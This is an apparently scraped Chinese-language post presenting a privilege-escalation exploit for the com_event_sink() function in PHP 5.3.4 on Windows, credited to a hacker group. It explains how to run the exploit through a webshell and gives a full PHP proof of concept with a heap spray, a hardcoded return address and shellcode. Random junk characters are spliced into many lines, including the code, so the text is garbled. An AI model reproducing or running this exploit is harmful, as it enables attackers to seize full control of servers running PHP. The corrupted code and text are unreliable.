PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中

) G$ @1 k, f( X7 E2 r. y4 o测试方法如下：cmd /c x:\php\php.exe x:\test.php
+ x2 P# i' X" K
$ i0 x" q3 @* ?下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
这里是两个测试的截图：



( |  y" x$ l$ \$ s

成功利用此漏洞的攻击者将获得系统的最高权限


1 \% w( b3 k2 h4 L( \& M! M% J2 v
5 ~  p' ?' a5 e$ U0 c3 z
4 Y5 ~5 X8 R( S3 d0 w
关于漏洞分析稍后附上。一下是PoC代码：
+ e/ O- e6 ^+ o7 c0 y1 o. U# K. ?5 a- S
<?php
& N8 X* f' D: \6 J8 u//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
//$eip ="\x44\x43\x42\x41";
7 }4 D9 ?1 w/ _$eip= "\x4b\xe8\x57\x78";
9 K- Y* c+ x- A$ f6 n" S5 R$eax ="\x80\x01\x8d\x04";
$deodrant="";
6 V1 o  |0 H  x( ~  \! [6 f: n+ F$axespray = str_repeat($eip.$eax,0x80);
  ~, \; Y, ]) H) N. d1 Y6 B//048d0190
echo strlen($axespray);
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
: D8 _, q* U9 v* V8 T//19200 ==4B32 4b00
9 Z5 B. c* s+ g% w* ?for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
. t) o( ~: v1 [+ E$u[] =$deodrant;
$r[] =$deodrant.$terminate;
9 o) D# M- Y' v, s# p$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
: |9 S7 T8 Q0 ~1 g6 T0 P1 n$ Z* Z" t//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
0 O8 F: S; ]# i0 e: ?4 r$vVar = new VARIANT(0x048d0000+180);
//弹窗代码(Shellcode)
! q1 J  m+ Q. h5 K$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
* G4 u2 ]6 n: |% ]/ B6 G$var2 = new VARIANT(0x41414242);
+ Y/ H; B9 b! t; z9 k# _  tcom_event_sink($vVar,$var2,$buffer);
9 y* h4 Z' I+ h?>